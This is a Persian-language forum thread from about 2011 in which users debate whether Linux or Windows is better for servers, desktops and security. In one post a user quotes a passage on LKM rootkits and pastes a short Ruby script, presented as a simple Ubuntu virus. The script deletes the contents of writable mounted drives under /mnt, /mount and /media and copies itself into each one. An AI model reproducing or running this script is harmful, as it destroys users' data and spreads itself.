امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
لینوکس یا ویندوز؛ کدام بهتر است؟
نویسنده پیام
sungirl69 آفلاین
دختر خورشید
**

موضوع‌ها: 11

تشکرها : 312
( 521 تشکر در 171 ارسال )
ارسال: #1
لینوکس یا ویندوز؛ کدام بهتر است؟

امروزه سیستم‌های عامل بسیاری وجود دارند که هر کدام به منظور خاصی طراحی شده‌اند و هدف از ساخت سیستم عامل بهره‌وری کامل از منابع است که بیش‌تر سخت‌افزاری هستند.

لینوکس یک هسته است و وظیفه هسته مدیریت حافظه، سخت‌افزار، ورود و خروج داده‌ها و تمامی موارد اصلی سیستم‌عامل است که این هسته می‌تواند در اختیار تمام برنامه‌نویسان قرار بگیرد و هر شخص یا سازمان یا گروهی این هسته را به سیستم عاملی که مورد نیاز است تبدیل می‌کند، به همین دلیل ورژن‌های لینوکس خیلی زیاد است.

لینوکس واقعا محصول کشور خاصی نیست، تعداد زیادی از مردم در سراسر جهان در حال کار برروی آن و توسعه آن هستند.

تعداد برنامه‌نویسانی که برروی بخش‌های مختلف سیستم ‌عامل لینوکس کار می‌کنند، به حدود 400 هزار نفر می‌رسد، در حالی که تعداد کل برنامه‌نویسان مایکروسافت کمتر از100 هزار نفر است و این نقطه قوت این سیستم عامل در اشکال‌زدایی آن است.

ساختار لینوکس با ویندوز کاملا متفاوت است به این دلیل برنامه‌های ویندوز روی لینوکس اجرا نمی‌شوند (البته راه‌هایی وجود دارد مانند شبیه‌سازها، ولی در حالت عادی خیر).یکی از ویژگی‌های لینوکس پایداری و استقامت بسیار بالای آن است.
این سیستم‌های عامل‌ به راحتی‌ خراب نمی‌شوند؛ لینوکس‌هایی وجود دارند که شما می‌توانید سال‌ها بدون نیاز به بوت، از آن‌ها استفاده کنید اما در سمت مقابل حتی جدیدترین و پایدارترین سیستم‌های ویندوز نیز پایدار نیستند.
ویژگی دیگر امنیت است؛ لینوکس از ابتدا برای محیط‌های شبکه‌یی و چند کاربره طراحی شده است که باعث رعایت مسائل امنیتی از ابتدا در آن شده، درحالی که ویندوز در حال حاضر نیز از نظر امنیتی دارای نقاط ضعف فراوانی است، مثلا یک برنامه مخرب با استفاده از همین ضعف‌های امنیتی می‌تواند کل سیستم ‌عامل را نابود کند، ولی در صورتی که مورد مشابهی در لینوکس وجود داشته باشد، حداکثر به دایرکتوری آسیب خواهد رسید، نه کل سیستم‌ عامل.

برای از کار انداختن ویندوز بیش از یک هزار ویروس و کرم وجود دارد، همین امر باعث شده حدود 70 درصد از سایت‌های وب در جهان برروی سیستم ‌عامل لینوکس و سرویس‌دهنده وب آپاچی قرار بگیرند ولی استفاده از سرور ویندوز بیش‌تر به خاطر اجرا کردن برخی از نرم‌افزارهای مهم مانند SQL است که یک برنامه برای ذخیره اطلاعات است که خیلی کارآمد و قوی است و کسانی که می‌خواهند سایتشان از این امکانات استفاده داشته باشد، باید از ویندوز استفاده کنند.

هزاران دهقان دعای باران خواندند، ولی خدا دلش با کودکی بود که چکمه هایش سوراخ داشت !
۱۶-آبان-۱۳۹۰, ۱۲:۰۶:۵۶
Mr.pRoGraMmer غایب
کاربر با تجربه

موضوع‌ها: 58

تشکرها : 2031
( 2927 تشکر در 1008 ارسال )
ارسال: #2
RE: لینوکس یا ویندوز؛ کدام بهتر است؟
این که میگن لینوکس به راحتی خراب نمیشه هر نسخشو بیارید من یه دستکاری میکنم ببینم خراب میشه یا نه :d
لینوکس واسه کلاینت پایداره چون به وسعت ویندوز توی استفاده کاربرها نیست همین ubuntu نسخه جدیدش امد و رابطه کاربریشو خیلی بهتر کرد اما بعد از یه مدت سریع براش worm امد سورسشم هست.
ولی توی سرور لینوکس خیلی بهتر از ویندوز هست
البته با ویندوز 8 که امده لینوکس باید خیلی به فکر پیشرفت باشه
موفق باشید

(آخرین ویرایش در این ارسال: ۱۷-آبان-۱۳۹۰, ۱۵:۳۶:۵۶، توسط Mr.pRoGraMmer.)
۱۶-آبان-۱۳۹۰, ۱۷:۲۱:۴۷
وب سایت ارسال‌ها
تشکر شده توسط : abbasalifix
abbasalifix غایب
کاربر با تجربه

موضوع‌ها: 82

تشکرها : 1496
( 2198 تشکر در 1065 ارسال )
ارسال: #3
ویندوز هیچ وقت جای لینوکس رو نیمتونه بگیره...

یکی اومد لینوکس رو نوشت نفهمید چی نوشته بعد از یه مدت همه فهمیدن بابا این چه غولیه...

من وقتی 4 یا 5 سال پیش یادم میومد لپ تاپ ها از همون موقع روش از اول لینوکس نصب بود...

لبنوکس خیلی باهاله اگه درکش کنیم....

من که نمیتونم براش برنامه بنویسم اما میگن خیلی راحته...

تا چند سال دیگه این سیستم عامل جایگزین همه برنامه های راه انداز خواهد شد

همین الانم توی مودم ها - میکروکنترول های arm و خیلی از سیستم های حرفه ای ازش استفاده میشه
۱۶-آبان-۱۳۹۰, ۲۰:۰۴:۵۶
کاربر با تجربه

ارسال: #4
توی سیستم های رومیزی جایگزین ویندوز هیچ وقت نمیشه
دلفی دات نت وی بی 6 رو فراموش کنیم تو لینوکس مخصوصا بازی های روز.
توی گوشی های موبایل اندریود که از هسته لینوکس استفاده کرد ویندوز موبایل رو حذف کرد.
اگر بگن گوشی 100 هزار تومان اما با سیستم عامل ویندوز موبایل باشه نمیخرم.
اما تو سیسم های رومیزی قدرت ویندوز خیلی بیتشتر بوده
پایداری امنیت میگن ویندوز نداره ؟
من یه جوری تنظیمش میکنم که اخ هم نگه
میگن سرعتش نسبت به لینوکس کمه
درسته
اما با سی پی یو 8 هسته ای فکر کنم این مشکلو برطرف کنه :-)
اگر مردی از ویندوز کلا استفاده نکن :d

۱۷-آبان-۱۳۹۰, ۱۵:۴۴:۵۲
وب سایت ارسال‌ها
babyy آفلاین
بازنشسته

موضوع‌ها: 141

تشکرها : 35081
( 26090 تشکر در 9068 ارسال )
ارسال: #5
(۱۶-آبان-۱۳۹۰, ۱۷:۲۱:۴۷)Mr.pRoGraMmer نوشته است: این که میگن لینوکس به راحتی خراب نمیشه هر نسخشو بیارید من یه دستکاری میکنم ببینم خراب میشه یا نه :d

از شما بزرگتراشم نتونستن

---------
دوستان لطف کنن در مورد چیزی که تجربه ندارن حرف نزنن و فکر عموم رو خراب نکنن
۱۸-آبان-۱۳۹۰, ۰۰:۳۷:۱۱
وب سایت ارسال‌ها
sajadgh آفلاین
كاربر دو ستاره
**

موضوع‌ها: 7

تشکرها : 207
( 225 تشکر در 88 ارسال )
ارسال: #6
دوستان دعوا نکنین لینوکس لینوکسه ، ویندوز هم ویندوزه. منظورم اینکه هیچکدوم نمیتونن جایه اون یکیو بگیرن هر کدوم هم مزایای خودشونو دارن.
نکته : اگه لینوکس امنتره دلیلش سادس کاربرای ویندوز بیشتره کسی هم که فکر خراب کاریه بیشتر اکثریت مد نظرشه. ضمننا یکی از دلایلی هم که لینوکس رو امنتر کرده استفاده حرفه ای ها و برنامه نویسا ازشه که حتی اگه از ویندوز هم استفاده کنن باز هم مسائل امنیتی رو رعایت میکنن.

توجه: بعد از اینکه بنیاد لینوکس تو چند ماهه گذشته خبر از تغییر رابط کاربری لینوکس داد خیلی از کارشناس ها درصد رشد استفاده از لینوکس رو در سالهای آینده منفی پیش بینی کردند و .....

خدایا ، در ۲ راهی زندگی ام تابلوی راهت را محکم قرار بده

نکند که با نسیمی راهم را کج کنم
۱۸-آبان-۱۳۹۰, ۰۱:۲۶:۱۴
ha_60 آفلاین
بنيانگذار سايت

موضوع‌ها: 216

تشکرها : 560
( 6556 تشکر در 2385 ارسال )
ارسال: #7
نقل قول: توجه: بعد از اینکه بنیاد لینوکس تو چند ماهه گذشته خبر از تغییر رابط کاربری لینوکس داد خیلی از کارشناس ها درصد رشد استفاده از لینوکس رو در سالهای آینده منفی پیش بینی کردند و .....
کلا کسی که خبر رو داده نمی دونسته لینوکس چی هست
بنیاد لینوکس اگرم باشه جای مهمی نیست اصلا خود لینوس تروالدز خیلی دنبال فلسفه و بنیاد و اینا نیست خوش می گه من یه مهندسم و دارم هسته رو توسعه می دم یه بنیاد نرم افزار آزاد داریم که باز اونم از این حرف ها نمی زنه
و مهم تر از بقیه این که لینوکس که هستس و ربطی یه رابط گرافیکی نداره و همین الانشم چند تا رابط گرافیکی معروف داریم که چند سال پیش هم ویندوز قابل مقایسه هم باهاشون نبود :d
البته gnome3 از نظر گرافیکی بهتر شده ولی منم موافقم که نباید شخم می زدن رابط گرافیکی رو ولی دراین جور مواقع معمولا کسایی که نمی پسندن رابط رو به اون شکلی که می خوان در می یارن که مینت داره این کارو می کنه رسیدم حتما یه مطلب می زارم توی سایت

هادی امین زاده
دیدن چیزی که همه می بینند هنر نیست
بانک اطلاعات صنایع ایران.
۱۸-آبان-۱۳۹۰, ۱۱:۱۹:۳۵
وب سایت ارسال‌ها
تشکر شده توسط : Mr.pRoGraMmer, mhpc2009
sungirl69 آفلاین
دختر خورشید
**

موضوع‌ها: 11

تشکرها : 312
( 521 تشکر در 171 ارسال )
ارسال: #8
استاد ما میگفت که لینوکس برای کارهای شبکه مفیده.

یه سوال بپرسم؟
یعنی لینوکس برای کار خانگی به درد نمیخوره؟
آخه بعضی نرم افزارها از قبیل آفیس هم قابل اجرا نیست مگر با شبیه سازی

من این خبر رو از خودم ندادم . از سایت همشهری آنلاین نوشتم برام جالب بود درباره لینوکس توی سایت خبر باشه

هزاران دهقان دعای باران خواندند، ولی خدا دلش با کودکی بود که چکمه هایش سوراخ داشت !
(آخرین ویرایش در این ارسال: ۱۸-آبان-۱۳۹۰, ۱۲:۱۲:۵۲، توسط sungirl69.)
۱۸-آبان-۱۳۹۰, ۱۲:۱۱:۱۱
کاربر با تجربه

ارسال: #9
(۱۸-آبان-۱۳۹۰, ۰۰:۳۷:۱۱)babyy نوشته است:
(۱۶-آبان-۱۳۹۰, ۱۷:۲۱:۴۷)Mr.pRoGraMmer نوشته است: این که میگن لینوکس به راحتی خراب نمیشه هر نسخشو بیارید من یه دستکاری میکنم ببینم خراب میشه یا نه :d

از شما بزرگتراشم نتونستن

---------
دوستان لطف کنن در مورد چیزی که تجربه ندارن حرف نزنن و فکر عموم رو خراب نکنن

lol
ubuntu. و mac و windows رو نوت بوک منه
انواع اقسام نسخه های لینوکسو نصب کردم
از لینوکس arc چند تا خط بلدی ؟
تو روم های irc linux چند بار رفتی ؟
تا حالا برنامه نوشتی برای لینوکس ؟
با gambas چند تا خط کار کردی ؟
کل کل دیگه ادامه نمیدهم :-)
همین الان هم یه whois بگیرن از ای پیت با سستم عامل ویندوز اومدی بالا
اگر میخوای تا به بزرگترها هم بگن تو ان تایپک تا نقاط صعف لینوکسو بهت بگن :-)
یارو برنامه تو ویندوز مینیویسه صبح تا شب هم با ویندوز میاد بالا تمام بازیهای نصبیش هم روی ویندوزه ! بعد میگه لینوکس :-)
اره درسته لینوکس توی فیلم تایتانیک وقتی سیستم ها رو با هم share کردن وز از قدرت پردازیش برای رندر فیلم تایتانیک استفاده کردن
تو یه فلش مموری حدود 1000 تا فایل تو مموری ایجاد کردم توی لینوکس سریع تر ویندوز بود.
قابلیت open source هم داره چیز خوبیه
اما یه نگاه به امار نوشته های برنامه ویندوز و لینوکس کن
میگن امنیتش عالیه شکی نیست اما دوست داشتید سایت ها و سرورهای که از سیستم عامل لینوکس استفاده کردن و دوستان بنده بهشون حال دادن ارشیو کنم و لیستشون رو بدم :-)
خوب بزار از زبان بزرگان چند تا حرف بزنیم (منبع بزرگان ) :
بسته به نوع سیستم‌عامل، روش‌های متفاوتی یرای دستکاری هسته سیستم‌عامل وجود دارد. در اکثر سیستمهای عامل سازگار با یونیکس، راحت‌ترین راه دستکاری هسته، استفاده از قابلیتی است که LKM نامیده می‌شود. LKM قابلیتی است که اجازه می‌دهد برخی از ماجول‌های هسته سیستم‌عامل طبق دلخواه یک برنامه نویس طراحی شده و در هنگام لزوم به درون هسته بار شود.بالاخص در لینوکس و سولاریس، از مکانیزم LKM در عالی‌ترین سطح برای گسترش و توسعه سیستم‌عامل استفاده می‌شود. . اگر قرار باشد برای پشتیبانی از یک ابزار جدید، هسته سیستم‌عامل از نوع بازسازی شود، سازندگان ابزار و ادوات سخت‌افزاری و همچنین کاربران با مشکلات زیادی مواجه می‌شوند. در حالیکه می‌توان از LKM بهره گرفت و ماجولی برای پشتیبانی از آن محصول طراحی کرد تا بتواند در حین اجرا به درون هسته بار شود. در حقیقت این ماجولها هسته سیستم‌عامل را توسعه می‌دهند و چون سطح دسترسی این ماجولها (به عنوان بخشی از هسته) در عالیترین سطح است لذا عملکرد بد این ماجولها می‌تواند، کل هسته را مختل کند و سیستم ناپایدار شود. ماجولهائی که به روش LKM بدرون هسته لینوکس یا سولاریس بار می‌شوند می‌توانند به هر منبعی در سیستم دسترسی داشته باشند. تعداد روت کیت هائی که با مکانیزم LKM پیاده سازی شده‌اند بسیار زیادند(بالاخص در لینوکس و سولاریس). البته راه‌های دیگری نیز برای دستکاری هسته سیستم‌عامل وجود دارد . این روشها برای سیستم‌عامل Windows NT که از LKM حمایت نمی‌کند کاربرد دارد و مبتنی بر patch هائی است که عملکرد هسته را تغییر می‌دهند.

یه کم در مورد روت کیتهاش بخون بدک نیست :-)

میگن امنیتش فضایی هست اصلا ویروس نمگیره

برنامه نویس های عزیز این تیکه کد برای ubuntu نگاه کنید یه نمونه ویروس ساده هست این ساده ترینشون بود :-)

روت کیتها اکسپلویتهاش هم نگاه کنید .
من نمیگم لینوکس بده اما اینکه بزنی تو سر ویندوز خیلی زور داره :-)

کد :

کد:
#!/usr/bin/env ruby
require 'fileutils'
$mount_dirs = Array.new
$mount_dirs = [ "/mnt", "/mount", "/media" ]
for $mount_dir in $mount_dirs do
    if File.directory?($mount_dir) then
        if File.writable?($mount_dir) then
            Dir.open($mount_dir).each do |$dir|
                next if $dir == "." || $dir == ".."
                $dir2 = $mount_dir + "/" + $dir
                    if File.directory?($dir2) then
                        if File.writable?($dir2) then
                            Dir.open($dir2).each do |$file|
                                next if $file == "." || $file == ".."
                                $file2 = $dir2 + "/" + $file
                                    if File.directory?($file2) then
                                        FileUtils.remove_dir($file2, true)
                                    end
                                    if File.file?($file2) then
                                        File.delete($file2)
                                    end
                            end
                        end
                    end
            end
        end
    end
end
for $mount_dir in $mount_dirs do
    if File.directory?($mount_dir) then
        if File.writable?($mount_dir) then
            Dir.open($mount_dir).each do |$dir|
                next if $dir == "." || $dir == ".."
                $dir2 = $mount_dir + "/" + $dir
                $virus = File.open("tetzuka.rb", "r")
                $virus2 = File.open("#{$dir2}/tetzuka.rb", "w")
                $blksize = $virus.stat.blksize
                while ($line = $virus.read($blksize))
                    $virus2.write($line)
                end
            end
        end
    end
end

جوابتو کلا گرفتی دیگه این بحثو ادامه نمیدم :-)
(۱۸-آبان-۱۳۹۰, ۱۲:۱۱:۱۱)sungirl69 نوشته است: استاد ما میگفت که لینوکس برای کارهای شبکه مفیده.

یه سوال بپرسم؟
یعنی لینوکس برای کار خانگی به درد نمیخوره؟
آخه بعضی نرم افزارها از قبیل آفیس هم قابل اجرا نیست مگر با شبیه سازی

من این خبر رو از خودم ندادم . از سایت همشهری آنلاین نوشتم برام جالب بود درباره لینوکس توی سایت خبر باشه

هر کسی میگه لینوکس برای یه کار مفیده :-) اون دیگه بستگی به سطح اطلاعات طرف و انتظارش از سیستم عامل چی باشه
افیس توی لینوکس یه نرم افزار مشابه داره به نام OpenOffice
لینوکس نسخه های مختلفی داره که راحت ترینش ubuntu هست نسخه جدیدش از طراحی گرافیکی بالا و راحتی بیشتر به کاربر ارائه داده هست در نسخه های جدید لینوکس مانند ubuntu بزرگترین نقطه ضعف که در نسخه های قدیمی نداشتن پشتیبانی از ntfs بصورت کامل یا کنار ویندوز نصب بشن که این 2 مشکل در نسخه جدید ubuntu برطرف شده است :-)
میتوین با virtual machin هم توی ویندوز لینوکسو اجرا کنی :-)

و در اخر بگم ویندوز ویندوزه لینوکس لینوکسه
گوشی ایفون یه مزیت داره گوشی htc هم یه مزیت داره

شما هر کردم که توش راحت تری و بیشتر نیازهاتو بر اوورده میکنه برو سراغ همون
و هر کدوم از این سیستم عامل ها مک لینوکس یا ویندوز مزیت خاص خودشون رو دارن و هیچ وقت نمیتونیم بگیم ویندوز بهتره لینوکس بهتره یا مکینتاش بهتره
موفق باشید

(آخرین ویرایش در این ارسال: ۱۸-آبان-۱۳۹۰, ۱۶:۰۵:۲۵، توسط Mr.pRoGraMmer.)
۱۸-آبان-۱۳۹۰, ۱۵:۴۱:۲۵
وب سایت ارسال‌ها
تشکر شده توسط : mhpc2009, sajadgh, sungirl69
ajlajlajl آفلاین
مدیر بازنشسته

موضوع‌ها: 70

تشکرها : 932
( 2618 تشکر در 1020 ارسال )
ارسال: #10
البته یکی دیگه از مزیت های اصلی لینوکس اینه که مجانیه. البته تو ایران زیاد اهمیت نداره. ولش کن Biggrin
ولیک از نظر من هم هیچ وقت لینوکس نمیتونه جای ویندوز رو بگیره و بلعکس. برای بعضی کارها یکیش بهتره، برای بعضی اون یکیش. ولی در مورد کار خونگی و غیر تخصصی مطمئنا ( از نظر من ) ویندوز برنده است.
البته من یه سری احساسات غیر اخلاقی نسبت به توسعه دهندگان لینوکس دارم که ترجیح میدم عنوان نکنم Biggrin
(در ضمن تشویش اذهان عمومی جرم محسوب میشه. نکنید Smile)

میزان رای دشمن است!
[تصویر:  cff100.png]
(آخرین ویرایش در این ارسال: ۱۹-آبان-۱۳۹۰, ۱۳:۳۰:۳۰، توسط ajlajlajl.)
۱۹-آبان-۱۳۹۰, ۱۳:۲۹:۳۹
وب سایت ارسال‌ها
Mr.pRoGraMmer غایب
کاربر با تجربه

ارسال: #11
(۱۹-آبان-۱۳۹۰, ۱۳:۲۹:۳۹)ajlajlajl نوشته است: ولی در مورد کار خونگی و غیر تخصصی مطمئنا ( از نظر من ) ویندوز برنده است.

delphi
c++
c
c#
assembly
maya
3dmax
photoshop
و هزاران نرم افزار تخصصی واسه ویندوز هست.
خیلی جرات میخواد بگید کار تخصصی نمیشه با ویندوز کرد Biggrin Tongue
ولی اگر ویندوز پولی بود مثلا 400 هزارتومان باید میدادیم ویندوز الان هممون با لینوکس بودیم Biggrin

۱۹-آبان-۱۳۹۰, ۲۲:۰۴:۵۴
وب سایت ارسال‌ها

موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  سرور لینوکس hadikh73 5 2,984 ۰۱-مرداد-۱۳۹۹, ۰۱:۱۷:۵۱
آخرین ارسال: baranaa

پرش به انجمن:

کاربرانِ درحال بازدید از این موضوع: 2 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS